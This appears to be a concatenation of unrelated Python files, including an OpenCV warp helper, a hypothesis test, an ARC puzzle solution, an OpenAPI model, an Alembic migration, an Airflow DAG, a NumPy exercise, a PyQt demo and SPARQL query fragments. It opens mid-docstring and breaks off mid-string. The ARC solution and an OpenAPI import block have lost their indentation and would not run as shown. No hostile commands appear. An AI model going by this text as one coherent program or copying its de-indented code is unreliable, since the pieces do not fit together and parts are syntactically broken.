            show (bool): Specifying whether to show plotted results.
                Default: False.
            out_dir (str): A directory to save results, Default: None.
            win_name (str): The name of windows, Default: ''.

        Returns:
            list: The prediction results.
        """
        from mmcls.apis import single_gpu_test
        outputs = single_gpu_test(
            model, data_loader, show, out_dir, win_name=win_name, **kwargs)
        return outputs
|
import cv2
import numpy as np
from PIL import Image, ImageDraw
def transform_roi_to_quad(simg, dimg, src, dst, visualize=False):
    '''
    Transforms a source rectangle image into a destination quad.

    Parameters
    ----------
    simg : ndarray
        Source image as generated by `np.asarray(Image.open(...))`
    dimg : ndarray
        Destination image as generated by `np.zeros_like(simg)`.
        Modified in place: the quad region is overwritten with warped content.
    src : tuple of Point
        Region of interest in the source image
    dst : tuple of Point
        Quad in the destination image
    visualize : bool, optional
        When True, show matplotlib debug plots of the intermediate results.
        Default False — identical behaviour to before this flag existed.

    `src` is given as `(tl, br)`. E.g., `((0, 0), (100, 100))` takes the
    rectangle from x=0, y=0 to x=100, y=100.
    `dst` is given as `(tl, tr, br, bl)`, where each point is `(x, y)`.
    '''
    # Source points, i.e. roi in input image
    roi = src
    tl = (roi[0][0], roi[0][1])
    tr = (roi[1][0], roi[0][1])
    br = (roi[1][0], roi[1][1])
    bl = (roi[0][0], roi[1][1])
    pts = np.array([tl, tr, br, bl])
    # Find (or know) target points in output image w.r.t. the quad
    # Attention: The order must be the same as defined by the roi points!
    dst_pts = np.array(dst)
    # Get transformation matrix, and warp image
    pts = np.float32(pts.tolist())
    dst_pts = np.float32(dst_pts.tolist())
    M = cv2.getPerspectiveTransform(pts, dst_pts)
    image_size = (dimg.shape[1], dimg.shape[0])
    warped = cv2.warpPerspective(simg, M, dsize=image_size)
    # Get mask from quad in output image, and copy content from warped image
    mask = np.zeros_like(dimg)
    mask = cv2.fillConvexPoly(mask, np.int32(dst_pts), (255, 255, 255))
    mask = mask.all(axis=2)
    dimg[mask, :] = warped[mask, :]
    if not visualize:
        return
    # Visualization of intermediate steps.  This code was previously dead
    # (placed after an unconditional `return`); it is now reachable via the
    # backward-compatible `visualize` flag.
    import matplotlib.pyplot as plt
    simg_with_roi = Image.fromarray(simg)
    draw = ImageDraw.Draw(simg_with_roi)
    draw.rectangle(roi, outline=(255, 0, 0), width=5)
    warped_with_dst = Image.fromarray(warped)
    draw = ImageDraw.Draw(warped_with_dst)
    draw.polygon((dst), outline=(255, 0, 0))
    plt.figure(0, figsize=(18, 9))
    plt.subplot(1, 5, 1), plt.imshow(simg_with_roi), plt.title('Source Image with ROI')
    plt.subplot(1, 5, 2), plt.imshow(warped_with_dst), plt.title('Warped with dst')
    plt.subplot(1, 5, 4), plt.imshow(mask), plt.title('Mask')
    plt.subplot(1, 5, 5), plt.imshow(dimg), plt.title('Dimg')
    plt.tight_layout(), plt.show()
|
import hypothesis
import hypothesis.strategies as st
import cb58ref
@hypothesis.given(st.binary())
def test_decode_inverts_encode(s):
    """Property test: cb58decode is a left inverse of cb58encode for any bytes."""
    assert cb58ref.cb58decode(cb58ref.cb58encode(s)) == s
|
'''[CT5148] Assignment 3
Student Name: Narae Kim
Student ID: 19240062
'''
import sys
import json
import numpy as np
import codecs
class SolutionFor1f0c79e5:
def __init__(self, filename):
self.filename = filename
def split_json_into_train_test(self):
with open(self.filename) as file:
input = json.load(file)
train = input["train"]
test = input["test"]
return (train, test)
def defining_indices(self, row_index, col_index, isleft=True, istop=True):
if isleft:
col_stop = -1
col_step = -1
else:
col_stop = self.c_end
col_step = 1
if istop:
row_stop = -1
row_step = -1
else:
row_stop = self.r_end
row_step = 1
row_indices = []
for r_index in range(row_index, row_stop, row_step):
row_indices.append(r_index + row_step)
row_indices.append(r_index + row_step)
row_indices.append(r_index)
row_indices.append(r_index)
col_indices = []
for c_index in range(col_index, col_stop, col_step):
col_indices.append(c_index + col_step)
col_indices.append(c_index)
col_indices.append(c_index + col_step)
col_indices.append(c_index)
return row_indices, col_indices
def solve(self, input_grid):
input_grid_copy = np.array(input_grid.copy())
[color] = [c for c in np.unique(input_grid_copy) if c != 0 and c != 2]
self.r_end, self.c_end = input_grid_copy.shape
nonzero_indices = np.where(input_grid_copy != 0)
box_indices = list(zip(nonzero_indices[0], nonzero_indices[1]))
islefttop = (input_grid_copy[box_indices[0]] == 2)
isrighttop = (input_grid_copy[box_indices[1]] == 2)
isleftbottom = (input_grid_copy[box_indices[2]] == 2)
isrightbottom = (input_grid_copy[box_indices[3]] == 2)
output_grid = input_grid_copy.copy()
# if the red edge is at the left top of the square box
if islefttop:
rightbottom_row, rightbottom_col = box_indices[3]
row_indices, col_indices = self.defining_indices(rightbottom_row, rightbottom_col, True, True)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c >= 0:
output_grid[r,c] = color
# if the red edge is at the right top of the square box
if isrighttop:
leftbottom_row, leftbottom_col = box_indices[2]
row_indices, col_indices = self.defining_indices(leftbottom_row, leftbottom_col, False, True)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c < self.c_end:
output_grid[r,c] = color
# if the red edge is at the left bottom of the square box
if isleftbottom:
righttop_row, righttop_col = box_indices[1]
row_indices, col_indices = self.defining_indices(righttop_row, righttop_col, True, False)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c >= 0:
output_grid[r, c] = color
# if the red edge is at the right bottom of the square box
if isrightbottom:
lefttop_row, lefttop_col = box_indices[0]
row_indices, col_indices = self.defining_indices(lefttop_row, lefttop_col, False, False)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c < self.c_end:
output_grid[r, c] = color
return output_grid.tolist()
def printing_grid(self, result_grid):
for r in result_grid:
print(*r)
print("\n\n")
def testing_solve(self, json_file=""):
if json_file == "":
json_file = "output_1f0c79e5.json"
train, test = self.split_json_into_train_test()
train_dict_list = []
for i in range(len(train)):
train_dict = {}
input_grid = train[i]["input"]
train_dict['input'] = input_grid # json train input
result_grid = self.solve(input_grid)
self.printing_grid(result_grid)
train_dict['output'] = result_grid # json train output by solve function
train_dict_list.append(train_dict)
test_dict_list = []
for j in range(len(test)):
test_dict = {}
test_input_grid = test[j]["input"]
test_dict['input'] = test_input_grid
test_result_grid = self.solve(test_input_grid)
self.printing_grid(test_result_grid)
test_dict['output'] = test_result_grid
test_dict_list.append(test_dict)
json_dict = {'train': train_dict_list, 'test': test_dict_list}
json.dump(json_dict, codecs.open(json_file, 'w', encoding='utf-8'), indent=None)
######################## Test #########################
# The task JSON path may be supplied on the command line; otherwise fall
# back to the default training-data location.
if len(sys.argv) > 1:
    json1f0c79e5 = sys.argv[1]
else:
    json1f0c79e5 = "../data/training/1f0c79e5.json"
# Create the object
solution = SolutionFor1f0c79e5(json1f0c79e5)
solution.testing_solve()
# Another way of saving JSON output file with a given filename
#output_json_file = "output.json"
#solution.testing_solve(output_json_file)
#!/usr/bin/env python3
"""
Given the names and grades for each student in a class of students,
store them in a nested list and print the name(s) of any student(s) having the second lowest grade.
Ref: https://www.programiz.com/python-programming/list-comprehension
"""
if __name__ == '__main__':
    records = []
    for _ in range(int(input())):
        name = input()
        score = float(input())
        # input records
        records.append([name, score])
    # The module docstring asks for the name(s) of student(s) with the
    # SECOND lowest grade; the original only printed the raw records.
    # A set collapses duplicate grades so [1] is the second lowest distinct.
    second_lowest = sorted({score for _, score in records})[1]
    # Matching names, alphabetically, one per line.
    for name in sorted(n for n, s in records if s == second_lowest):
        print(name)
# coding: utf-8
"""
VAAS API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class InlineObject2(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Maps attribute name -> OpenAPI type string (consumed by to_dict()).
    openapi_types = {
        'enable_ssh': 'bool',
        'external_access_cidr_block': 'list[str]'
    }

    # Maps attribute name -> JSON key in the API definition.
    attribute_map = {
        'enable_ssh': 'enable_ssh',
        'external_access_cidr_block': 'external_access_cidr_block'
    }

    def __init__(self, enable_ssh=None, external_access_cidr_block=None, local_vars_configuration=None):  # noqa: E501
        """InlineObject2 - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration.get_default_copy()
        self.local_vars_configuration = local_vars_configuration

        self._enable_ssh = None
        self._external_access_cidr_block = None
        self.discriminator = None

        # enable_ssh is optional; external_access_cidr_block is required
        # (its setter validates non-None / non-empty).
        if enable_ssh is not None:
            self.enable_ssh = enable_ssh
        self.external_access_cidr_block = external_access_cidr_block

    @property
    def enable_ssh(self):
        """Gets the enable_ssh of this InlineObject2.  # noqa: E501

        :return: The enable_ssh of this InlineObject2.  # noqa: E501
        :rtype: bool
        """
        return self._enable_ssh

    @enable_ssh.setter
    def enable_ssh(self, enable_ssh):
        """Sets the enable_ssh of this InlineObject2.

        :param enable_ssh: The enable_ssh of this InlineObject2.  # noqa: E501
        :type enable_ssh: bool
        """
        self._enable_ssh = enable_ssh

    @property
    def external_access_cidr_block(self):
        """Gets the external_access_cidr_block of this InlineObject2.  # noqa: E501

        :return: The external_access_cidr_block of this InlineObject2.  # noqa: E501
        :rtype: list[str]
        """
        return self._external_access_cidr_block

    @external_access_cidr_block.setter
    def external_access_cidr_block(self, external_access_cidr_block):
        """Sets the external_access_cidr_block of this InlineObject2.

        :param external_access_cidr_block: The external_access_cidr_block of this InlineObject2.  # noqa: E501
        :type external_access_cidr_block: list[str]
        """
        # Validation only applies when client_side_validation is enabled.
        if self.local_vars_configuration.client_side_validation and external_access_cidr_block is None:  # noqa: E501
            raise ValueError("Invalid value for `external_access_cidr_block`, must not be `None`")  # noqa: E501
        if (self.local_vars_configuration.client_side_validation and
                external_access_cidr_block is not None and len(external_access_cidr_block) < 1):
            raise ValueError("Invalid value for `external_access_cidr_block`, number of items must be greater than or equal to `1`")  # noqa: E501

        self._external_access_cidr_block = external_access_cidr_block

    def to_dict(self, serialize=False):
        """Returns the model properties as a dict"""
        result = {}

        def convert(x):
            # Recursively serialize nested models; pass plain values through.
            if hasattr(x, "to_dict"):
                args = getfullargspec(x.to_dict).args
                if len(args) == 1:
                    return x.to_dict()
                else:
                    return x.to_dict(serialize)
            else:
                return x

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            # When serializing, emit JSON keys from attribute_map.
            attr = self.attribute_map.get(attr, attr) if serialize else attr
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: convert(x),
                    value
                ))
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], convert(item[1])),
                    value.items()
                ))
            else:
                result[attr] = convert(value)

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, InlineObject2):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, InlineObject2):
            return True

        return self.to_dict() != other.to_dict()
|
from pathlib import Path
import pandas as pd
from XGEN_flux_file_parsing import get_dataframes_from_XGEN_files, default_flux_data_folder
from input_dialogs import get_files_from_user
# Directory containing this script (and its cell_info.csv companion file).
thisdir = Path(__file__).parent.resolve()


def add_cell_info(data_summ: pd.DataFrame):
    """Join per-port cell metadata from cell_info.csv onto the summary frame."""
    cell_info = pd.read_csv(thisdir / 'cell_info.csv')
    return data_summ.merge(cell_info, on='Port')
def merge_backgrounds(data_summ: pd.DataFrame):
    '''Tries to add a background measurement for each Fluxcal measurement.

    Important! Assumes that if there is a flux measurement followed by a
    background measurement under the same cell+timestamp, then that background
    corresponds to that flux measurement.

    If there are two+ background measurements in a row, only the first one will
    be used.'''
    # Split the summary into flux vs background rows.
    grouped = data_summ.groupby('Meas. type')
    flx = grouped.get_group('Fluxcal')
    bg = grouped.get_group('Background')
    flx = flx.drop('Meas. type', axis=1)
    bg = bg.drop('Meas. type', axis=1)
    # A flux row's background is the row with the *next* measurement number
    # under the same (Timestamp, Port, Temp.) key — hence "+ 1".
    flx['BG num'] = flx['Meas. num'] + 1
    cols = ['Timestamp', 'Port', 'Temp. (deg C)']
    left_on = cols + ['BG num']
    right_on = cols + ['Meas. num']
    # Left join: flux rows without a matching background get NaN BG columns.
    merged = flx.merge(bg, left_on=left_on, right_on=right_on, how='left', suffixes=['', ' (BG)'])
    # Where a background matched, average its noise into the flux noise.
    mask = ~merged['Noise (BG)'].isna()
    merged.loc[mask, 'Noise'] = (merged.loc[mask, 'Noise'] + merged.loc[mask, 'Noise (BG)'])/2
    merged.drop(['BG num', 'Meas. num (BG)', 'Noise (BG)'], axis=1, inplace=True)
    merged.rename(
        columns={
            'Avg. reading': 'Reading',
            'Avg. reading (BG)': 'Background',
        },
        inplace=True
    )
    return merged
def renumber_measurements(data_summ: pd.DataFrame):
    """Re-number 'Meas. num' from 0 within each (Timestamp, Port, Temp.) group.

    Returns a new DataFrame; the caller's frame is not modified (the original
    assigned into groupby views, risking SettingWithCopy behaviour).
    """
    groups = data_summ.groupby(['Timestamp', 'Port', 'Temp. (deg C)'])
    renumbered = []
    for _, group in groups:
        group = group.copy()  # never write into a view of the input frame
        group['Meas. num'] = range(len(group))
        renumbered.append(group)
    return pd.concat(renumbered, ignore_index=True)
def clean_up_flux_data(data_summ):
    """Full clean-up pipeline: attach backgrounds, renumber measurements,
    then join per-cell metadata. Returns the cleaned DataFrame."""
    return add_cell_info(renumber_measurements(merge_backgrounds(data_summ)))
if __name__ == '__main__':
    # Hard-code a path here to bypass the file-picker dialog.
    path = None
    #path = default_flux_data_folder / "FluxReadingCell1_01_20211216_154309.txt"
    paths = [path]
    if not path:
        # No hard-coded file: ask the user interactively.
        paths = get_files_from_user(
            initialdir=default_flux_data_folder
        )
    data_summ, data_full = get_dataframes_from_XGEN_files(paths)
    #add_cell_info(data_summ)
    print(clean_up_flux_data(data_summ))
"""hosts and interfaces
Revision ID: 6f1a37baa574
Revises: cd588620e7d0
Create Date: 2018-09-17 15:38:56.401301
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy import table, column, String
import pycroft
# revision identifiers, used by Alembic.
# This migration (6f1a37baa574) follows cd588620e7d0 in the revision chain.
revision = '6f1a37baa574'
down_revision = 'cd588620e7d0'
branch_labels = None
depends_on = None
def upgrade():
    """Rename the `user_mac_change` property to `user_hosts_change`."""
    prop = table('property', column('name', String))  # renamed local: don't shadow builtin `property`
    stmt = (
        prop.update()
        .where(prop.c.name == op.inline_literal('user_mac_change'))
        .values({'name': op.inline_literal('user_hosts_change')})
    )
    op.execute(stmt)
def downgrade():
    """Revert the rename: `user_hosts_change` back to `user_mac_change`."""
    prop = table('property', column('name', String))  # renamed local: don't shadow builtin `property`
    stmt = (
        prop.update()
        .where(prop.c.name == op.inline_literal('user_hosts_change'))
        .values({'name': op.inline_literal('user_mac_change')})
    )
    op.execute(stmt)
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from .chat_invite_link_count import ChatInviteLinkCount
from ..base_object import BaseObject
class ChatInviteLinkCounts(BaseObject):
    """
    Contains a list of chat invite link counts

    :param invite_link_counts: List of invite link counts
    :type invite_link_counts: :class:`list[ChatInviteLinkCount]`
    """

    ID: str = Field("chatInviteLinkCounts", alias="@type")
    invite_link_counts: list[ChatInviteLinkCount]

    @staticmethod
    def read(q: dict) -> ChatInviteLinkCounts:
        # Build the model from a raw TDLib dict without validation.
        return ChatInviteLinkCounts.construct(**q)
|
import random
import datetime
from airflow import models
from airflow.operators import bash_operator
from airflow.operators import python_operator
from airflow.operators import dummy_operator
# Start the DAG at midnight yesterday so the first scheduled run is immediate.
yesterday = datetime.datetime.combine(
    datetime.datetime.today() - datetime.timedelta(1),
    datetime.datetime.min.time())

default_dag_args = {
    'start_date': yesterday
}

with models.DAG(
        'branching_python_operator',
        schedule_interval=datetime.timedelta(days=1),
        default_args=default_dag_args) as dag:

    def greeting():
        """Log a greeting; the return value becomes the task's XCom."""
        print('Greetings from SpikeySales! Happy shopping.')
        return 'Greeting successfully printed.'

    def makeBranchChoice():
        """Randomly choose the next task id: 40% 'hello_spikey', 60% 'dummy'."""
        x = random.randint(1, 5)
        if (x <= 2):
            return 'hello_spikey'
        else:
            return 'dummy'

    run_this_first = dummy_operator.DummyOperator(
        task_id='run_this_first'
    )

    branching = python_operator.BranchPythonOperator(
        task_id='branching',
        python_callable=makeBranchChoice
    )

    run_this_first >> branching

    # BUG FIX: this task was assigned to `ales_greeting` but referenced below
    # as `sales_greeting`, so the DAG file raised NameError at parse time.
    sales_greeting = python_operator.PythonOperator(
        task_id='hello_spikey',
        python_callable=greeting)

    dummy_followed_python = dummy_operator.DummyOperator(
        task_id='follow_python')

    dummy = dummy_operator.DummyOperator(
        task_id='dummy')

    # 'one_success' lets the final task run whichever branch was taken.
    bash_greeting = bash_operator.BashOperator(
        task_id='bye_bash',
        bash_command='echo Goodbye! Hope to see you soon.',
        trigger_rule='one_success'
    )

    branching >> sales_greeting >> dummy_followed_python >> bash_greeting
    branching >> dummy >> bash_greeting
|
## exercise 0.4.5
import numpy as np
# Setup two arrays
x = np.arange(1,6)
y = np.arange(2,12,2)
# Have a look at them by typing 'x' and 'y' in the console
# There's a difference between matrix multiplication and elementwise
# multiplication, and specifically in Python it's also important if you
# are using the multiply operator "*" on an array object or a matrix object!
# Use the * operator to multiply the two arrays:
x*y
# Now, convert the arrays into matrices -
x = np.asmatrix(np.arange(1,6))
y = np.asmatrix(np.arange(2,12,2))
# Again, have a look at them by typing 'x' and 'y' in the console
# Try using the * operator just as before now:
# NOTE: the next line INTENTIONALLY raises a ValueError (1x5 * 1x5 is not a
# valid matrix product) -- this script is meant to be run line by line.
x*y
# You should now get an error - try to explain why.
# array and matrix are two data structures added by NumPy package to the list of
# basic data structures in Python (lists, tuples, sets). We shall use both
# array and matrix structures extensively throughout this course, therefore
# make sure that you understand differences between them
# (multiplication, dimensionality) and that you are able to convert them one
# to another (asmatrix(), asarray() functions).
# Generally speaking, array objects are used to represent scientific, numerical,
# N-dimensional data. matrix objects can be very handy when it comes to
# algebraic operations on 2-dimensional matrices.
# The ambiguity can be circumvented by using explicit function calls:
np.transpose(y) # transposition/transpose of y
y.transpose() # also transpose
y.T # also transpose
np.multiply(x,y) # element-wise multiplication
np.dot(x,y.T) # matrix multiplication
x @ y.T # also matrix multiplication
# There are various ways to make certain type of matrices.
a1 = np.array([[1, 2, 3], [4, 5, 6]]) # define explicitly
a2 = np.arange(1,7).reshape(2,3) # reshape range of numbers
a3 = np.zeros([3,3]) # zeros array
a4 = np.eye(3) # diagonal array
a5 = np.random.rand(2,3) # random array
a6 = a1.copy() # copy
a7 = a1 # alias (a7 and a1 share the same underlying data)
m1 = np.matrix('1 2 3; 4 5 6; 7 8 9') # define matrix by string
m2 = np.asmatrix(a1.copy()) # copy array into matrix
m3 = np.mat(np.array([1, 2, 3])) # map array onto matrix
a8 = np.asarray(m1) # map matrix onto array
# It is easy to extract and/or modify selected items from arrays/matrices.
# Here is how you can index matrix elements:
m = np.matrix('1 2 3; 4 5 6; 7 8 9')
m[0,0] # first element
m[-1,-1] # last element
m[0,:] # first row
m[:,1] # second column
m[1:3,-1] # view on selected rows&columns
# Similarly, you can selectively assign values to matrix elements or columns:
m[-1,-1] = 10000
m[0:2,-1] = np.matrix('100; 1000')
m[:,0] = 0
# Logical indexing can be used to change or take only elements that
# fulfil a certain constraint, e.g.
m2[m2>0.5] # display values in m2 that are larger than 0.5
m2[m2<0.5] = 0 # set all elements that are less than 0.5 to 0
# Below, several examples of common matrix operations,
# most of which we will use in the following weeks.
# First, define two matrices:
m1 = 10 * np.mat(np.ones([3,3]))
m2 = np.mat(np.random.rand(3,3))
m1+m2 # matrix summation
m1*m2 # matrix product
np.multiply(m1,m2) # element-wise multiplication
m1>m2 # element-wise comparison
m3 = np.hstack((m1,m2)) # combine/concatenate matrices horizontally
# note that this is not equivalent to e.g.
# l = [m1, m2]
# in which case l is a list, and l[0] is m1
m4 = np.vstack((m1,m2)) # combine/concatenate matrices vertically
m3.shape # shape of matrix
m3.mean() # mean value of all the elements
m3.mean(axis=0) # mean values of the columns
m3.mean(axis=1) # mean values of the rows
m3.transpose() # transpose, also: m3.T
m2.I # compute inverse matrix
|
import sys
from PyQt5.QtWidgets import QComboBox,QStatusBar,QHBoxLayout,QWidget,QApplication,QMainWindow
from PyQt5.QtCore import *
class QStatusBarDemo(QMainWindow):
    """Demo window: a QComboBox whose current selection is echoed in the status bar."""

    def __init__(self):
        super(QStatusBarDemo, self).__init__()
        # Set the window size
        self.resize(400, 150)
        # Set the window title
        self.setWindowTitle("QComboBoxDemo")

        self.comboBox = QComboBox()
        self.comboBox.addItems(['C','C#','C++'])
        # Re-show the status message whenever the selection changes.
        self.comboBox.currentIndexChanged.connect(self.itemChange)

        self.statusBar = QStatusBar()
        self.setStatusBar(self.statusBar)

        # Create a horizontal layout holding the combo box.
        layout = QHBoxLayout()
        layout.addWidget(self.comboBox)

        mainFrame = QWidget()
        mainFrame.setLayout(layout)
        self.setCentralWidget(mainFrame)

    def itemChange(self):
        # Show the chosen text for 1000 ms; the Chinese suffix ("menu option
        # was selected") is a user-facing string and is kept verbatim.
        self.statusBar.showMessage(self.comboBox.currentText()+'菜单选项被选中了',1000)
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, show the demo window,
    # then hand control to the event loop until it exits.
    app = QApplication(sys.argv)
    demo_window = QStatusBarDemo()
    demo_window.show()
    sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
import json, re
from SPARQLWrapper import SPARQLWrapper, JSON
### START SPARQL header
# Endpoint of the local Virtuoso SPARQL service.
SPARQL_HOST = '''http://localhost:8890/sparql'''
# Prefixes prepended to every generated query.
SPARQL_PREFIXES = '''
PREFIX obo: <http://purl.obolibrary.org/obo/>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX efo: <http://www.ebi.ac.uk/efo/>
'''
# SPARQL_GRAPH = '''<http://www.semanticweb.org/rdb20/ontologies/2017/8/dikb-etypes-09222017#>'''
# SPARQL_GRAPH = '''http://www.semanticweb.org/rdb20/ontologies/2018/1/dikb-etypes-0206018#'''
# Named graphs queried by the evidence-type inference queries.
SPARQL_FROM_GRAPH = '''FROM <http://www.semanticweb.org/rdb20/ontologies/2018/1/dikb-etypes-04042018#>
FROM <http://purl.obolibrary.org/obo/dideo.owl#>'''
### END SPARQL header
### START retrieve evidence types (this goes AFTER the other parts specific to clinical trials, case reports, and experiments)
# Shared query tail: binds each evidence item's types, labels and definitions,
# keeping only the most specific classes (any asserted subclass removes its parent).
SPARQL_EV_TYPE = '''
?evItem a ?evType; # get all of the other evidence types this is classified as
obo:IAO_0000136 ?aItem. # an evidence item is about the assay item ?aItem
?evType rdfs:label ?label; # get the evidence type label...
obo:IAO_0000115 ?definition. # ...and definition(s)
FILTER NOT EXISTS {
?evItem a ?z.
?z rdfs:subClassOf ?evType.
}
'''
### END retrieve evidence types
### START of case report instance query parts
# Positive/negative fragment pairs: each positive pattern has a matching
# "FILTER NOT EXISTS" twin used when the reviewer answered "no".
SPARQL_OBSERVATIONAL_REPORT = '''
?aItem obo:RO_0002404 ?pItem. # causally downstream of some occurrent
?pItem a obo:BFO_0000003.
'''
SPARQL_ADVERSE_EVENT = '''
# the occurrent IS an adverse event
?pItem a obo:OAE_0000005.
'''
SPARQL_NOT_ADVERSE_EVENT = '''
# the occurrent is NOT an adverse drug event
FILTER NOT EXISTS {
?pItem a obo:OAE_0000005.
}
'''
SPARQL_PRECEDED_BY_DRUG_ADMIN = '''
?pItem obo:BFO_0000062 ?da. # preceded by drug administration
?da a obo:DRON_00000031.
'''
SPARQL_NOT_PRECEDED_BY_DRUG_ADMIN = '''
FILTER NOT EXISTS {
?pItem obo:BFO_0000062 ?da. # preceded by drug administration
?da a obo:DRON_00000031.
}
'''
SPARQL_DDI_ROLES = '''
?da obo:RO_0000057 ?d1. # the drug administration has participant some entity that is the bearer of an object drug role
?d1 obo:RO_0000053 ?oRole.
?oRole a obo:DIDEO_00000012.
?da obo:RO_0000057 ?d2. # the drug administration has participant some entity that is the bearer of a precipitant drug role
?d2 obo:RO_0000053 ?precRole.
?precRole a obo:DIDEO_00000013.
'''
SPARQL_NOT_DDI_ROLES = '''
FILTER NOT EXISTS {
?da obo:RO_0000057 ?d1. # the drug administration has participant some entity that is the bearer of an object drug role
?d1 obo:RO_0000053 ?oRole.
?oRole a obo:DIDEO_00000012.
?da obo:RO_0000057 ?d2. # the drug administration has participant some entity that is the bearer of a precipitant drug role
?d2 obo:RO_0000053 ?precRole.
?precRole a obo:DIDEO_00000013.
}
'''
SPARQL_REPORT_IN_PUBLIC_DATABASE = '''
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:BFO_0000050 ?prdb. # is part of a public reporting database
?prdb a obo:DIDEO_00000082.
'''
SPARQL_REPORT_NOT_IN_PUBLIC_DATABASE = '''
FILTER NOT EXISTS {
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:BFO_0000050 ?prdb. # is part of a public reporting database
?prdb a obo:DIDEO_00000082.
}
'''
SPARQL_REPORT_EVALUATED_FOR_CAUSALITY = '''
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:OBI_0000312 ?pp. # is specified output of planned process that is an ADE causality evaluation protocol
?pp obo:BFO_0000055 ?re. # (realizes a realizable entity...)
?re obo:RO_0000059 ?adeep. # (...that concretizes a planned process...)
?adeep a obo:DIDEO_00000087. # (... that is an ADE causality evaluation protocol)
'''
SPARQL_REPORT_NOT_EVALUATED_FOR_CAUSALITY = '''
FILTER NOT EXISTS {
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:OBI_0000312 ?pp. # is specified output of planned process that is an ADE causality evaluation protocol
?pp obo:BFO_0000055 ?re. # (realizes a realizable entity...)
?re obo:RO_0000059 ?adeep. # (...that concretizes a planned process...)
?adeep a obo:DIDEO_00000087. # (... that is an ADE causality evaluation protocol)
}
'''
### END of case report instance query parts
### START of clinical trial instance query parts
# Fragments composed by getInferredEvType() from the clinical-trial answers.
SPARQL_RANDOMIZATION = '''
?aItem obo:BFO_0000051 ?pItem. # has_part
?pItem a obo:OBI_0302900. # group randomization design
'''
SPARQL_NO_RANDOMIZATION = '''
?gItem a owl:NegativePropertyAssertion;
owl:sourceIndividual ?aItem;
owl:targetIndividual obo:OBI_0302900. # an assay item is the source individual for a negative property assertion about group randomization
'''
SPARQL_PAR_GROUPS = '''
?aItem obo:BFO_0000055 ?rItem. # the assay realizes a design
?rItem a obo:BFO_0000017;
obo:RO_0000059 ?cItem. # the realizable entity concretizes a clinical study design
?cItem a obo:OBI_0500001;
obo:BFO_0000051 ?pItem. # the clinical study design has_part
?pItem a obo:OBI_0500006. # parallel group design
'''
SPARQL_NOT_PAR_GROUPS = '''
FILTER NOT EXISTS {
?aItem obo:BFO_0000055 ?rItem. # the assay realizes a design
?rItem a obo:BFO_0000017;
obo:RO_0000059 ?cItem. # the realizable entity concretizes a clinical study design
?cItem a obo:OBI_0500001;
obo:BFO_0000051 ?pItem. # the clinical study design has_part
?pItem a obo:OBI_0500006. # parallel group design
}
'''
SPARQL_PK = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some drug
?dItem1 a obo:CHEBI_24431. # CHEBI chemical entity
?aItem obo:OBI_0000293 ?oItem1. # has specified input some organism
?oItem1 a obo:OBI_0100026; # dideo:organism
obo:RO_0000056 ?pItem1. # participates_in
?pItem1 a obo:DIDEO_00000052. # dideo:pharmacokinetic process
'''
SPARQL_NOT_PK = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some drug
?dItem1 a obo:CHEBI_24431. # CHEBI chemical entity
?aItem obo:OBI_0000293 ?dItem2.FILTER(?dItem1 != ?dItem2) # has specified input some other drug
?dItem2 a obo:CHEBI_24431. # CHEBI chemical entity
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?oItem1. # has specified input some organism
?oItem1 a obo:OBI_0100026; # dideo:organism
obo:RO_0000056 ?pItem1. # participates_in
?pItem1 a obo:DIDEO_00000052. # dideo:pharmacokinetic process
}
'''
SPARQL_PHENOTYPE = '''
?aItem obo:OBI_0000293 ?oItem2. # has specified input some organism
?oItem2 a obo:OBI_0100026; # organism
obo:RO_0000056 ?pItem2. # participates_in
?pItem2 a obo:ERO_0000923. # phenotype characterization
'''
SPARQL_NOT_PHENOTYPE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?oItem2. # has specified input some organism
?oItem2 a obo:OBI_0100026; # organism
obo:RO_0000056 ?pItem2. # participates_in
?pItem2 a obo:ERO_0000923. # phenotype characterization
}
'''
SPARQL_GENOTYPE = '''
?aItem obo:OBI_0000293 ?oItem3. # has specified input some organism
?oItem3 a obo:OBI_0100026; # organism
obo:RO_0000056 ?gItem3. # participates_in
?gItem3 a efo:EFO_0000750. # genotype characterization
'''
SPARQL_NOT_GENOTYPE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?oItem3. # has specified input some organism
?oItem3 a obo:OBI_0100026; # organism
obo:RO_0000056 ?gItem3. # participates_in
